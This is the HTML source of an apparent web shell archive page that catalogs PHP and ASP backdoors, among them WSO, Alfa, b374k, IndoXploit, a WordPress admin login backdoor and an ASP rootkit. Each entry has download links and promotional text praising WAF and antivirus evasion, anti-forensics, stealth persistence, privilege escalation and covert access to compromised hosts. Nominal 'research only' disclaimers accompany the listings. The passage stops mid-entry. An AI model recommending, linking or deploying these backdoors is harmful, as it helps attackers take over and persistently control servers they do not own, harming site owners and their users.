<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>phpshells.net | PHP Web Shell Archive, Bypass & Symlink Shells (C99, R57, WSO, Priv8)</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="description" content="phpshells.net — The most advanced underground archive for PHP web shells, ASPX shells, bypass scripts, symlink tools, file manager shells, and redteam backdoors. Download legendary and modern shells like C99, R57, WSO, Alfa Shell, IndoXploit, priv8 and more. Educational research only."><meta name="keywords" content="php shell, web shell, aspx shell, asp shell, bypass shell, symlink shell, file manager shell, c99 shell, r57, wso, alfa shell, indoxploit, priv8 shell, redteam shell, upload shell, admin shell, malware analysis, ethical hacking, webshell, backdoor, underground shell archive, phpshells.net"><meta name="robots" content="index, follow"><link rel="canonical" href="https://phpshells.net/" /><meta property="og:site_name" content="phpshells.net"><meta property="og:title" content="phpshells.net — PHP Web Shell Archive, Bypass, Symlink & Redteam Tools"><meta property="og:description" content="Discover legendary and new generation PHP web shells, aspx shell, bypass and symlink tools. Download C99, R57, Alfa Shell, WSO, priv8, file manager shells. For redteam, pentest and cyber security research only."><meta property="og:url" content="https://phpshells.net/" /><meta property="og:type" content="website"><meta property="og:image" content="https://phpshells.net/data/phpshells.jpg" /><meta name="twitter:card" content="summary_large_image"><meta name="twitter:title" content="phpshells.net — Dark Web Shell & Bypass Archive"><meta name="twitter:description" content="The world’s most complete PHP shell, bypass, symlink & admin shell collection for redteam and ethical hacking."><meta name="twitter:image" content="https://phpshells.net/data/phpshells.jpg"><link rel="icon" type="image/png" href="/media/favicon.png"><link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet"><style> :root { --bg: #101217; --bg2: #181a1f; --terminal: #b2ffbe; --matrix: #41ff7c; --gray: #c1ccc6; --white: #f6fff6; --line: #23272f; --border: #252830; --badge: #242c2b; --badge2: #353e39; } html, body { margin: 0; padding: 0; background: var(--bg); color: var(--matrix); font-family: 'JetBrains Mono', monospace; font-size: 15px; min-height: 100vh; letter-spacing: .01em; } body { min-height: 100vh; display: flex; flex-direction: column; align-items: center; justify-content: flex-start; } header { background: var(--bg2); border-bottom: 2px solid var(--line); display: flex; align-items: center; justify-content: center; width: 100%; height: 62px; box-shadow: 0 3px 18px #0fffa019; font-size: 1.08rem; font-family: 'JetBrains Mono', monospace; user-select: none; position: sticky; top: 0; z-index: 10; padding: 0; } .header-inner { display: flex; align-items: center; justify-content: center; width: 100%; max-width: 1080px; } .logo { color: var(--matrix); font-family: 'JetBrains Mono', monospace; font-weight: 900; font-size: 1.22rem; letter-spacing: 0.13em; padding-right: 18px; background: linear-gradient(90deg, var(--matrix) 75%, #0fffa0 100%); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 0 0 2px #0fffa055, 0 0 18px #0fffa015; text-transform: lowercase; border-right: 1.5px solid var(--line); height: 44px; display: flex; align-items: center; margin-right: 16px; } .terminal-bar { flex: 1 1 auto; display: flex; align-items: center; height: 44px; font-size: 1.04rem; color: var(--matrix); margin-left: 18px; position: relative; } .terminal-bar input { background: transparent; border: none; outline: none; font-size: 1.01rem; color: var(--white); font-family: inherit; width: 220px; margin-left: 6px; padding: 3px 0; border-bottom: 1.5px solid var(--matrix); transition: border .14s; } .terminal-bar input:focus { border-bottom: 1.5px solid #66ffb2; } .terminal-cursor { animation: blink .8s steps(1) infinite; color: var(--matrix); font-weight: bold; font-size: 1.09em; margin-left: 2px; } @keyframes blink { 50% { opacity: 0; } } .cyber-content-block { display: flex; flex-wrap: wrap; align-items: center; justify-content: center; background: #171b1f; border-radius: 15px; border: 1.5px solid #252830; box-shadow: 0 2px 18px #41ff7c18; max-width: 880px; margin: 38px auto 44px auto; gap: 0; padding: 0; overflow: hidden; } .cyber-content-img { flex: 0 0 320px; min-width: 230px; max-width: 350px; background: #111217; border-right: 1.5px solid #23292e; display: flex; align-items: stretch; justify-content: center; padding: 0; height: 100%; } .cyber-content-img img { width: 100%; height: 100%; object-fit: cover; display: block; border-radius: 0; box-shadow: none; min-height: 210px; background: #171b1f; } .cyber-content-txt { flex: 1 1 340px; min-width: 230px; padding: 32px 36px 24px 32px; display: flex; flex-direction: column; gap: 8px; } .cyber-content-txt h2 { color: #41ff7c; font-family: 'JetBrains Mono', monospace; font-weight: 900; font-size: 1.11rem; letter-spacing: 0.08em; margin: 0 0 13px 0; } .cyber-content-txt p { color: #b7ffe1; font-size: 1.01rem; font-family: 'JetBrains Mono', monospace; opacity: .94; margin: 0 0 11px 0; line-height: 1.7; } .cyber-content-txt b, .cyber-content-txt strong { color: #fff; background: #1b3220; border-radius: 5px; padding: 2px 6px; font-weight: 800; letter-spacing: 0.01em; } .shell-list-wrap { width: 100%; max-width: 800px; margin: 42px auto 0 auto; display: flex; flex-direction: column; align-items: center; padding: 0 12px; } .ascii-title { color: var(--matrix); font-size: 1.11rem; font-family: 'JetBrains Mono', monospace; letter-spacing: .09em; margin-bottom: 9px; opacity: .9; text-align: center; width: 100%; } .shell-table { width: 100%; border-spacing: 0; background: var(--bg2); border-radius: 11px; border: 1.5px solid var(--border); box-shadow: 0 2px 15px #41ff7c16; margin-bottom: 20px; overflow: hidden; } .shell-table th, .shell-table td { font-size: 0.99rem; padding: 11px 8px; text-align: left; border-bottom: 1px solid var(--line); } .shell-table th { color: var(--matrix); background: var(--bg2); font-weight: 900; font-size: 1.01rem; letter-spacing: .05em; border-bottom: 2px solid var(--border); user-select: none; text-align: left; } .shell-table tr { transition: background .10s, box-shadow .11s; } .shell-table tr:hover { background: #172817; box-shadow: 0 0 0 1px #1fa67d22, 0 3px 18px #41ff7c19; } .badge { background: var(--badge2); color: var(--matrix); border-radius: 5px; padding: 2px 9px; font-size: 0.88rem; font-weight: 700; letter-spacing: .03em; margin-right: 4px; border: 1px solid var(--badge); box-shadow: 0 1px 3px #41ff7c13; display: inline-block; } .actions { display: flex; gap: 7px;} .action-btn { background: #121315; color: var(--matrix); border: 1.2px solid var(--line); font-family: 'JetBrains Mono', monospace; border-radius: 6px; padding: 4px 13px; font-weight: 800; font-size: 0.89rem; cursor: pointer; text-decoration: none; transition: border .11s, background .12s, color .12s, box-shadow .11s; box-shadow: 0 1px 5px #41ff7c12; margin-top: 2px; } .action-btn:hover { background: #183420; color: #fff; border: 1.3px solid var(--matrix); box-shadow: 0 2px 10px #41ff7c22; } .desc { color: #b7ffe1; font-size: 0.95rem; opacity: .81; max-width:220px; white-space:nowrap; overflow:hidden; text-overflow:ellipsis; display: inline-block; } .shell-article-row { background: #141a14; } .shell-article { padding: 24px 18px 10px 18px; color: #b7ffe1; font-size: 1.01rem; font-family: 'JetBrains Mono', monospace; line-height: 1.6; border-top: 1px dashed #252830; } .shell-article h3 { color: #41ff7c; margin-top: 0; margin-bottom: 8px; font-size: 1.08rem; } .shell-article ul {margin: 0 0 12px 15px; padding-left:0;} .shell-article li {margin-bottom:7px;} .shell-article b, .shell-article strong { color: #fff; background: #1b3220; border-radius: 5px; padding: 2px 6px; font-weight: 800; } footer { text-align: center; color: #93e7ba; font-size: 0.96rem; margin-top: 36px; padding-bottom: 20px; font-family: 'JetBrains Mono', monospace; opacity: .55; width: 100%; } @media (max-width: 900px) { .shell-list-wrap {max-width:97vw;} .shell-table th, .shell-table td {padding: 9px 5px;} .desc{max-width:100px;} .header-inner{max-width:97vw;} .cyber-content-block {flex-direction: column;} .cyber-content-img {border-right: none; border-bottom:1.5px solid #23292e; max-width:99vw;} .cyber-content-txt {padding: 22px 7vw 18px 7vw;} } @media (max-width: 600px) { header, .header-inner { flex-direction: column; height: auto; padding: 0; min-width:0; } .logo {font-size:1.04rem;margin-right:0;padding: 12px 0 8px 0;border-right:none;} .header-inner {align-items:center;justify-content:center;} .terminal-bar {margin-left:0;} .shell-list-wrap {margin-top: 28px;} .ascii-title{font-size:.92rem;} .shell-table th, .shell-table td{padding:7px 1px;} .desc{max-width:45vw;} .cyber-content-block {max-width:99vw;} .cyber-content-img img {min-height: 120px;} .cyber-content-txt {padding: 13px 3vw 10px 3vw;} .cyber-content-txt h2 {font-size: .97rem;} .cyber-content-txt p {font-size: .95rem;} } </style></head><body><header><div class="header-inner"><div class="logo">phpshells.net</div><div class="terminal-bar"><span style="color:#5dffbe;"><a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="4d383e283f0d3d253d3e252821213e63232839">[email protected]</a>:</span><span style="color:#41ff7c;">~</span><span style="color:#fff;">$</span><input id="searchbar" placeholder="find shell..." autocomplete="off"><span class="terminal-cursor">█</span></div></div></header><div class="shell-list-wrap"><div class="ascii-title"><span>==[ PHP WEB SHELL ARCHIVE ]==</span></div><table class="shell-table" id="shellTable"><thead><tr><th>Name</th><th>Tags</th></tr></thead><tbody id="shellTableBody"></tbody></table></div><div class="cyber-content-block"><div class="cyber-content-img"><img src="https://phpshells.net/data/phpshells.jpg" alt="phpshells.net cyber promo banner" loading="lazy"></div><div class="cyber-content-txt"><h2>PHP Web Shell, Bypass & Symlink Tools — Redteam Archive</h2><p><strong>phpshells.net</strong> is the most trusted cyber archive for <b>php shell</b>, <b>aspx shell</b>, <b>asp shell</b>, <b>bypass shell</b> and <b>symlink shell</b> scripts, dedicated to penetration testing, malware analysis and redteam operations. </p><p> Discover legendary shells such as <b>C99</b>, <b>R57</b>, <b>Alfa Shell</b>, <b>WSO</b>, <b>IndoXploit</b> and modern <b>file manager</b>, <b>upload shell</b>, <b>cloudflare bypass</b>, <b>priv8 shell</b>, <b>admin shell</b> and <b>backdoor</b> tools curated by security researchers for ethical hacking, security testing and redteam research. </p><p> All webshells and bypass scripts are provided for <b>educational</b> and <b>authorized security research</b> only. Stay ahead in web exploitation with the most complete and up-to-date archive — <strong>phpshells.net</strong>. </p></div></div><footer> © 2025 phpshells.net — curated by real hackers. For research only.</footer><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>const shellData = [ { name: 'Alfa v4.0 Shell', tags: ['php','file manager','bypass','encrypted'], raw: 'https://phpshells.net/shells/alfashell_decoded.txt', download: 'https://phpshells.net/shells/alfashell.zip', desc: 'Classic PHP file manager shell, known for stable ops on shared hosts and encrypted comms. Chosen by phpshells.net for its ability to evade most security tools.', article: ` <h3>Alfa v4.0 Shell – Secure PHP Web Shell & File Manager</h3><p><strong>Alfa v4.0 Shell</strong> is a legendary <b>PHP file manager shell</b> that provides stable and persistent access on shared hosting environments. Built for security and stealth, Alfa Shell includes encrypted communications, mass file operation capabilities, and proven bypass routines against many web firewalls. </p><ul><li>Encrypted traffic for stealth operations</li><li>Works on both legacy and modern PHP (5.x–8.x)</li><li>Tested for reliability on cPanel and shared Linux hosts</li><li>Highly regarded in the webshell community for stability and persistence</li></ul><p><b>Keywords:</b> php shell, file manager, bypass shell, encrypted webshell, cpanel shell, webshell archive, phpshells.net </p><p><b>Note:</b> For authorized penetration testing, malware analysis and redteam research only. </p> ` }, { name: 'Yanz Webshell', tags: ['php','priv8','bypass','cpanel'], raw: 'https://phpshells.net/shells/yanz_decoded.txt', download: 'https://phpshells.net/shells/yanz.zip', desc: 'Yanz Priv8 Webshell blends the iconic WSO UI with new bypass vectors. Trusted for bypassing cPanel and shared hosting. Curated exclusively at phpshells.net.', article: ` <h3>Yanz Webshell – WSO-Style Priv8 Bypass Shell</h3><p><strong>Yanz Webshell</strong> offers the classic WSO shell experience with a modern twist. Specially designed for <b>cPanel</b> and shared hosting bypass, Yanz Shell features multiple privilege escalation vectors, custom bypass techniques, and a familiar, clean UI. </p><ul><li>WSO-inspired interface with advanced authentication and obfuscation</li><li>Bypass techniques for cPanel and mod_security environments</li><li>Private access for stealth operations</li></ul><p><b>Keywords:</b> yanz shell, priv8 shell, php shell, wso ui, cpanel bypass, shared hosting shell, phpshells.net </p> ` }, { name: 'Megawaty File Manager', tags: ['php','minimal','file manager'], raw: 'https://phpshells.net/shells/MegawatyFileManager.txt', download: 'https://phpshells.net/shells/MegawatyFileManager.zip', desc: 'Super-light PHP file manager shell for quick directory traversal and archive ops. Recommended for its minimal footprint and fast UX on phpshells.net.', article: ` <h3>Megawaty File Manager – Minimalist PHP Shell</h3><p><b>Megawaty File Manager</b> is the go-to choice for pentesters seeking speed and simplicity. Designed for fast directory traversal, file upload, and archive extraction with a minimal codebase, this shell is nearly invisible in server logs. </p><ul><li>Ultra-lightweight for high stealth</li><li>Ideal for fast ops, minimal server impact</li><li>Works on most PHP configurations out-of-the-box</li></ul><p><b>Keywords:</b> minimal file manager, php shell, webshell, lightweight shell, archive ops, phpshells.net </p> ` }, { name: 'BypassServ Mini Shell', tags: ['php','bypass','stealth','anti-forensics'], raw: 'https://phpshells.net/shells/bypasserv-new.txt', download: 'https://phpshells.net/shells/bypasserv.zip', desc: 'A compact PHP backdoor focused on WAF bypass, stealth persistence, and encoded payloads. Selected by phpshells.net for silent access and anti-forensics.', article: ` <h3>BypassServ Mini Shell – Compact WAF/IDS Evasion Shell</h3><p><strong>BypassServ Mini Shell</strong> is engineered for stealth and forensic evasion. Its encoded payloads and anti-forensic design make it highly effective on protected servers and in advanced penetration tests. </p><ul><li>Compact, single-file, hard to detect</li><li>Bypasses common WAF/IDS rules</li><li>Flexible authentication, encrypted payloads</li></ul><p><b>Keywords:</b> bypass shell, anti-forensics, php backdoor, stealth shell, WAF evasion, phpshells.net </p> ` }, { name: 'Back Hack Bypass Shell', tags: ['php','bypass','privesc','hidden'], raw: 'https://phpshells.net/shells/backhackshell.txt', download: 'https://phpshells.net/shells/backhackshell.zip', desc: 'Hidden shell for privilege escalation, covert command execution, and bypass routines. Phpshells.net features it as a reference for effective modern shell techniques.', article: ` <h3>Back Hack Bypass Shell – Privilege Escalation and Bypass</h3><p><b>Back Hack Bypass Shell</b> is favored for its covert privilege escalation modules and ability to operate in restricted environments. It is frequently referenced in modern redteam and exploit development workflows. </p><ul><li>Covert file and command modules</li><li>Effective on protected and hardened hosts</li><li>Includes upload, hidden log, and privilege bypass functions</li></ul><p><b>Keywords:</b> privilege escalation, bypass shell, hidden php shell, exploit, phpshells.net </p> ` }, { name: 'HaxorSec V2 Shell', tags: ['php','stealth','multi-purpose','obfuscation'], raw: 'https://phpshells.net/shells/HaxorSecV2_decoded.txt', download: 'https://phpshells.net/shells/HaxorSecV2.zip', desc: 'Stealthy, multi-purpose PHP shell from the underground scene. Includes upload, bypass, persistent access and robust obfuscation. Part of the trusted archive at phpshells.net.', article: ` <h3>HaxorSec V2 Shell – Advanced Multi-Purpose Webshell</h3><p><b>HaxorSec V2</b> is known for its robust obfuscation, stealth routines, and flexible modules for persistence, upload, and bypass. Trusted in CTF and redteam communities for research and custom payload creation. </p><ul><li>Strong source obfuscation and stealth logic</li><li>Persistent login and upload bypass routines</li><li>Wide compatibility across PHP versions</li></ul><p><b>Keywords:</b> haxorsec shell, obfuscated php shell, stealth webshell, bypass, CTF shell, phpshells.net </p> ` }, { name: 'Luma Mini Shell Bypass', tags: ['php','minimal','bypass','forensic evasion'], raw: 'https://phpshells.net/shells/LumaMiniShellBypass.txt', download: 'https://phpshells.net/shells/LumaMiniShellBypass.zip', desc: 'Ultra-minimal shell for login bypass and encoded uploads. Chosen for phpshells.net due to its forensic evasion and one-click usage.', article: ` <h3>Luma Mini Shell Bypass – Minimal Forensic Evasion Shell</h3><p><strong>Luma Mini Shell</strong> is built for rapid deployment and forensic evasion. Its minimalist approach and one-click bypass methods make it a must-have for stealthy engagements. </p><ul><li>Encodes uploads to evade basic detection</li><li>Minimal attack surface, almost invisible in logs</li><li>Ideal for short-term access and redteam testing</li></ul><p><b>Keywords:</b> minimal shell, bypass shell, forensic evasion, encoded upload shell, phpshells.net </p> ` }, { name: '1337 Bypass Shell', tags: ['php','bypass','encrypted','password-protected'], raw: 'https://phpshells.net/shells/1337bypassshell.txt', download: 'https://phpshells.net/shells/1337bypassshell.zip', desc: 'Encrypted access shell with stealth file ops and password lock. Included in phpshells.net for blackbox tests and trusted redteam actions.', article: ` <h3>1337 Bypass Shell – Encrypted and Protected Access</h3><p><b>1337 Bypass Shell</b> provides encrypted access, password protection, and stealth file operations for high-trust redteam and blackbox operations. </p><ul><li>Built-in authentication and encryption</li><li>Safe for sensitive redteam and internal pentest use</li><li>Stealth features to bypass AV and web firewalls</li></ul><p><b>Keywords:</b> encrypted shell, bypass shell, password protected shell, redteam, blackbox, phpshells.net </p> ` }, { name: 'Hexor Mini Shell', tags: ['php','micro','obfuscation','backdoor'], raw: 'https://phpshells.net/shells/HexorMiniShell.txt', download: 'https://phpshells.net/shells/HexorMiniShell.zip', desc: 'Micro-sized PHP backdoor with strong obfuscation and minimal AV detection. A top pick for cyber research at phpshells.net.', article: ` <h3>Hexor Mini Shell – Micro PHP Backdoor</h3><p><b>Hexor Mini Shell</b> is an extremely small and well-obfuscated PHP backdoor, ideal for quick command execution and directory traversal with minimal detection risk. </p><ul><li>Micro footprint, high obfuscation</li><li>Fast, reliable command execution</li><li>Bypasses many traditional AV/IDS systems</li></ul><p><b>Keywords:</b> hexor shell, micro php backdoor, obfuscated webshell, redteam, phpshells.net </p> ` }, { name: 'Gecko Shell Web Backdoor', tags: ['php','ajax','file manager','modern'], raw: 'https://phpshells.net/shells/gecko_decoded.txt', download: 'https://phpshells.net/shells/gecko.zip', desc: 'AJAX-powered backdoor with advanced file and shell ops. Included in phpshells.net for agility, speed and covert exploitation.', article: ` <h3>Gecko Shell – AJAX-Driven PHP Backdoor</h3><p><strong>Gecko Shell</strong> delivers a modern, AJAX-based experience for fast and responsive file management, shell access, and covert exploitation. </p><ul><li>Modern UI, async file ops, shell commands</li><li>Rapid exploitation and session handling</li><li>Agile design for both manual and automated usage</li></ul><p><b>Keywords:</b> gecko shell, ajax backdoor, modern php shell, file manager, phpshells.net </p> ` }, { name: 'WordPress Admin Login Backdoor', tags: ['wordpress','bypass','admin','php'], raw: 'https://raw.githubusercontent.com/privdayzcom/wp-auto-admin-loginer/refs/heads/main/wp-admin.php', download: 'https://github.com/privdayzcom/wp-auto-admin-loginer/archive/refs/heads/main.zip', desc: 'Admin bypass for WordPress, offering direct CMS control and persistent login. Recommended at phpshells.net for plugin test and brute-force research.', article: ` <h3>WordPress Admin Login Backdoor – Bypass & Persistent CMS Control</h3><p><b>WordPress Admin Login Backdoor</b> allows instant admin panel access, bypassing authentication for penetration testing and exploit validation. </p><ul><li>Persistent access and login bypass for WordPress CMS</li><li>Ideal for plugin exploit research and brute-force prevention testing</li><li>Recommended for authorized pentesting engagements only</li></ul><p><b>Keywords:</b> wordpress backdoor, admin bypass, cms shell, php shell, phpshells.net </p> ` }, { name: 'Miyachung JS/PHP Web Shell', tags: ['php','js','hybrid','file manager'], raw: 'https://phpshells.net/shells/miya.txt', download: 'https://phpshells.net/shells/miya.txt.zip', desc: 'A hybrid PHP+JS shell offering cross-platform file management, AJAX controls and hidden triggers. Part of phpshells.net’s rare multi-tech shells.', article: ` <h3>Miyachung JS/PHP Web Shell – Hybrid Cross-Platform Shell</h3><p><b>Miyachung Shell</b> combines PHP and JavaScript to provide an interactive, cross-platform file manager and shell. Features include AJAX controls and hidden shell triggers. </p><ul><li>Blends PHP backend with JS/AJAX frontend</li><li>Stealth triggers and flexible file ops</li><li>Multi-platform compatibility</li></ul><p><b>Keywords:</b> miyachung shell, js/php shell, ajax shell, cross-platform webshell, phpshells.net </p> ` }, { name: 'Casper Web Shell Litespeed', tags: ['php','litespeed','stealth','file manager'], raw: 'https://phpshells.net/shells/casperwebshell.txt', download: 'https://phpshells.net/shells/casperwebshell.zip', desc: 'Shell tuned for Litespeed servers, rapid commands and hidden file management. In phpshells.net archive for Litespeed/cyber panel research.', article: ` <h3>Casper Web Shell – Litespeed-Optimized Stealth Shell</h3><p><b>Casper Shell</b> is optimized for Litespeed and cyberpanel environments, offering stealthy file management and rapid command execution. </p><ul><li>Special routines for Litespeed server evasion</li><li>Covert file management and upload/download</li><li>Compatible with most Linux hosting panels</li></ul><p><b>Keywords:</b> casper shell, litespeed shell, stealth file manager, php webshell, phpshells.net </p> ` }, { name: 'AnonSec Team Backdoor Shell', tags: ['php','backdoor','team','encoded'], raw: 'https://phpshells.net/shells/anonsec.txt', download: 'https://phpshells.net/shells/anonsec.zip', desc: 'Engineered for persistent access and shell uploads with encoded command injection. A classic in the phpshells.net archive for blackhat operation studies.', article: ` <h3>AnonSec Team Backdoor Shell – Encoded Command Access</h3><p><b>AnonSec Shell</b> is designed for persistent access, encoded command execution, and stealthy shell uploads, making it a staple in underground operations. </p><ul><li>Advanced encoding and upload modules</li><li>Persistent backdoor for long-term access</li></ul><p><b>Keywords:</b> anonsec shell, team shell, backdoor, encoded php shell, underground shell, phpshells.net </p> ` }, { name: 'Cloudflare Bypass Shell', tags: ['php','cloudflare','bypass','cdn'], raw: 'https://phpshells.net/shells/cloudflare_bypass.txt', download: 'https://phpshells.net/shells/cloudflare_bypass.zip', desc: 'CDN/WAF evasion shell for operating on protected assets. On phpshells.net as a prime example of bypass methodology.', article: ` <h3>Cloudflare Bypass Shell – CDN/WAF Evasion Specialist</h3><p><b>Cloudflare Bypass Shell</b> is crafted for pentesters and redteamers operating behind CDN, WAF or reverse proxy protections. Built-in routines target Cloudflare and similar security layers. </p><ul><li>Bypasses CDN caching and access restrictions</li><li>Includes stealth command and upload modules</li></ul><p><b>Keywords:</b> cloudflare bypass, cdn shell, waf evasion, php shell, protected asset, phpshells.net </p> ` }, { name: 'Php Hidden File Manager Mini Symlink', tags: ['php','symlink','file manager','hidden'], raw: 'https://phpshells.net/shells/phpfilemanager.txt', download: 'https://phpshells.net/shells/phpfilemanager.zip', desc: 'Minimal shell with stealth listing and symlink tools for shared hosting. Added to phpshells.net for its efficiency and silent ops.', article: ` <h3>PHP Hidden File Manager Mini Symlink – Stealth Directory Shell</h3><p><b>PHP Hidden File Manager</b> provides silent file listing and symlink tricks for penetration testing on shared and reseller hosting environments. </p><ul><li>Hidden directory listing for maximum stealth</li><li>Advanced symlink and vhost tricks</li><li>Low detection risk, high efficiency</li></ul><p><b>Keywords:</b> symlink shell, hidden file manager, php shell, stealth directory, vhost bypass, phpshells.net </p> ` }, { name: 'UCHIHA RAJON Web Shell', tags: ['php','admin','upload','anime'], raw: 'https://phpshells.net/shells/rajonshell.txt', download: 'https://phpshells.net/shells/rajonshell.zip', desc: 'Anime-styled admin shell with login, upload and persistent root. Added for its unique UI and usability on phpshells.net.', article: ` <h3>UCHIHA RAJON Web Shell – Anime UI PHP Admin Shell</h3><p><b>UCHIHA RAJON Shell</b> brings a visual flair to admin webshells, combining persistent access, upload features, and a unique anime-inspired UI for fun and research. </p><ul><li>Persistent login and root access</li><li>Custom UI for easy navigation</li><li>Trusted for usability in lab environments</li></ul><p><b>Keywords:</b> anime shell, admin webshell, php shell, unique UI shell, upload shell, phpshells.net </p> ` }, { name: 'Advanced File Manager Bypass', tags: ['php','file manager','bypass','stealth'], raw: 'https://phpshells.net/shells/filemngr.txt', download: 'https://phpshells.net/shells/filemngr.zip', desc: 'Stealth file manager with upload, download and hidden dir access. Curated at phpshells.net for bypass and redteam cases.', article: ` <h3>Advanced File Manager Bypass – Stealth File Ops</h3><p><b>Advanced File Manager Bypass</b> shell is packed with upload, download and hidden directory functions for seamless, stealth file operations on compromised hosts. </p><ul><li>Bypasses standard access controls and AV</li><li>Upload/download tools, recursive dir traversal</li></ul><p><b>Keywords:</b> file manager shell, bypass shell, stealth upload, directory traversal, phpshells.net </p> ` }, { name: 'Bypass 2024 Priv8 Shell', tags: ['php','bypass','priv8','modern'], raw: 'https://phpshells.net/shells/bypass2024priv8shell.txt', download: 'https://phpshells.net/shells/bypass2024priv8shell.zip', desc: 'Priv8 shell engineered for encrypted payloads and adaptive auth. Featured at phpshells.net for defeating modern firewall logic.', article: ` <h3>Bypass 2024 Priv8 Shell – Modern Adaptive Bypass Shell</h3><p><b>Bypass 2024 Priv8 Shell</b> was developed to defeat modern web firewalls and advanced AV with encrypted payloads and adaptive authentication logic. </p><ul><li>Encrypted communication and login routines</li><li>Adaptive modules for bypassing modern protections</li></ul><p><b>Keywords:</b> priv8 shell, bypass shell, adaptive shell, encrypted webshell, firewall bypass, phpshells.net </p> ` }, { name: 'Mrj Haxcore Bypass 403 Shell', tags: ['php','bypass','403','haxcore'], raw: 'https://phpshells.net/shells/mrj.txt', download: 'https://phpshells.net/shells/mrj.zip', desc: 'Bypasses HTTP 403 restrictions with stealth access logic. Selected by phpshells.net for post-exploitation testing.', article: ` <h3>Mrj Haxcore Bypass 403 Shell – HTTP Forbidden Bypass</h3><p><b>Mrj Haxcore Shell</b> is engineered to bypass HTTP 403 forbidden errors, enabling persistent access and hidden operations even on restricted hosts. </p><ul><li>Special access routines for bypassing 403 and denied responses</li><li>Suitable for post-exploitation and redteam scenarios</li></ul><p><b>Keywords:</b> 403 bypass shell, haxcore, post-exploitation, stealth shell, phpshells.net </p> ` }, { name: 'Indrajith Web Shell Symlink Bypass Tools', tags: ['php','symlink','bypass','vhost'], raw: 'https://phpshells.net/shells/indrajith.txt', download: 'https://phpshells.net/shells/indrajith.zip', desc: 'Symlink bypass and vhost enumeration toolkit, handpicked for high-scale redteam research at phpshells.net.', article: ` <h3>Indrajith Web Shell – Symlink and Vhost Toolkit</h3><p><b>Indrajith Shell</b> includes advanced symlink and virtual host discovery modules, essential for enumerating multi-user Linux/cPanel systems in redteam and forensic analysis. </p><ul><li>Automated symlink and vhost enumeration</li><li>Bypasses directory separation and chroot restrictions</li></ul><p><b>Keywords:</b> symlink shell, vhost enumeration, bypass shell, redteam toolkit, phpshells.net </p> ` }, { name: 'D7net Web Shell Bypass', tags: ['php','bypass','hidden','multi-layer'], raw: 'https://phpshells.net/shells/d7net.txt', download: 'https://phpshells.net/shells/d7net.zip', desc: 'Designed for hidden file drops and deep directory management. Part of phpshells.net’s expert-selected bypass shells.', article: ` <h3>D7net Web Shell Bypass – Deep Directory Shell</h3><p><b>D7net Shell</b> specializes in dropping hidden files and managing complex, multi-layer directory structures on Linux servers. </p><ul><li>Hidden file and multi-layer directory ops</li><li>Bypass logic for Linux web servers</li></ul><p><b>Keywords:</b> d7net shell, bypass webshell, directory management, hidden file shell, phpshells.net </p> ` }, { name: '403WebShell Bypass', tags: ['php','bypass','403','persistent'], raw: 'https://phpshells.net/shells/403webshell.txt', download: 'https://phpshells.net/shells/403webshell.zip', desc: 'Bypass HTTP forbidden errors and persistently control protected spaces. Included for research on phpshells.net.', article: ` <h3>403WebShell Bypass – Persistent HTTP Forbidden Shell</h3><p><b>403WebShell</b> is optimized for bypassing HTTP 403 forbidden responses and maintaining persistent access in locked-down environments. </p><ul><li>HTTP response manipulation and hidden session modules</li><li>Works on Linux and Windows web servers</li></ul><p><b>Keywords:</b> 403webshell, forbidden bypass, persistent shell, phpshells.net </p> ` }, { name: 'WAF Bypass PHP Javascript Upload Shell', tags: ['php','js','upload','bypass'], raw: 'https://phpshells.net/shells/privupload.txt', download: 'https://phpshells.net/shells/privupload.txt.zip', desc: 'Upload bypass shell leveraging PHP/JS hybrid methods. Selected by phpshells.net for modern file drop research.', article: ` <h3>WAF Bypass PHP/JS Upload Shell – Hybrid File Dropper</h3><p><b>WAF Bypass Upload Shell</b> utilizes both PHP and JavaScript logic to bypass file upload restrictions, web application firewalls, and mod_security. </p><ul><li>Advanced hybrid methods for file upload bypass</li><li>Bypasses most modern web security solutions</li></ul><p><b>Keywords:</b> waf bypass, js upload shell, php upload shell, file dropper, phpshells.net </p> ` }, { name: 'Wso Shell', tags: ['php','legendary','file manager','wso'], raw: 'https://phpshells.net/shells/wso.txt', download: 'https://phpshells.net/shells/wso.txt.zip', desc: 'Legendary PHP web shell with stable file manager and robust command features. Essential archive item at phpshells.net.', article: ` <h3>WSO Shell – The Classic All-in-One PHP Webshell</h3><p><b>WSO Shell</b> is one of the most recognized web shells globally, favored for its stable file manager, broad compatibility, and robust command toolset. </p><ul><li>Stable file manager and multi-tool design</li><li>Trusted in underground and research circles for over a decade</li></ul><p><b>Keywords:</b> wso shell, legendary php shell, file manager, command shell, phpshells.net </p> ` }, { name: 'b374k Shell', tags: ['php','modular','open-source','backdoor'], raw: 'https://phpshells.net/shells/break.txt', download: 'https://phpshells.net/shells/break.txt.zip', desc: 'Open-source, modular PHP backdoor with plugin architecture and encrypted comms. A recommended modern shell on phpshells.net.', article: ` <h3>b374k Shell – Modular Open-Source Webshell</h3><p><b>b374k Shell</b> stands out with its open-source, plugin-based architecture, making it highly extensible and customizable for a variety of redteam operations. </p><ul><li>Modular design with plugin support</li><li>Encrypted communications and stealth ops</li><li>Community-maintained and updated</li></ul><p><b>Keywords:</b> b374k shell, modular webshell, open source backdoor, plugin shell, phpshells.net </p> ` }, { name: 'IndoXploit Shell v3', tags: ['php','indoxploit','modern','file manager'], raw: 'https://phpshells.net/shells/indoxploit.txt', download: 'https://phpshells.net/shells/indoxploit.txt.zip', desc: 'Popular Indonesian web shell with powerful file ops and shell commands. A staple of the phpshells.net archive.', article: ` <h3>IndoXploit Shell v3 – Modern Redteam Web Shell</h3><p><b>IndoXploit v3</b> is known for powerful file operations, advanced command support, and active development from the Indonesian hacking scene. Its password protection and user-friendly design make it a staple for research labs. </p><ul><li>Advanced file manager and upload modules</li><li>Password-protected access, command exec and connect-back</li></ul><p><b>Keywords:</b> indoxploit shell, modern php shell, file manager, redteam webshell, phpshells.net </p> ` }, { name: 'AspRootkit 1.0 by BloodSword', tags: ['asp','windows','rootkit','privesc'], raw: 'https://phpshells.net/shells/asprootkit.txt', download: 'https://phpshells.net/shells/asprootkit.zip', desc: 'A rare ASP-based rootkit shell for advanced redteam tasks and privilege escalation on Windows. Featured in phpshells.net for its underground legacy and unique persistence methods.', article: ` <h3>AspRootkit 1.0 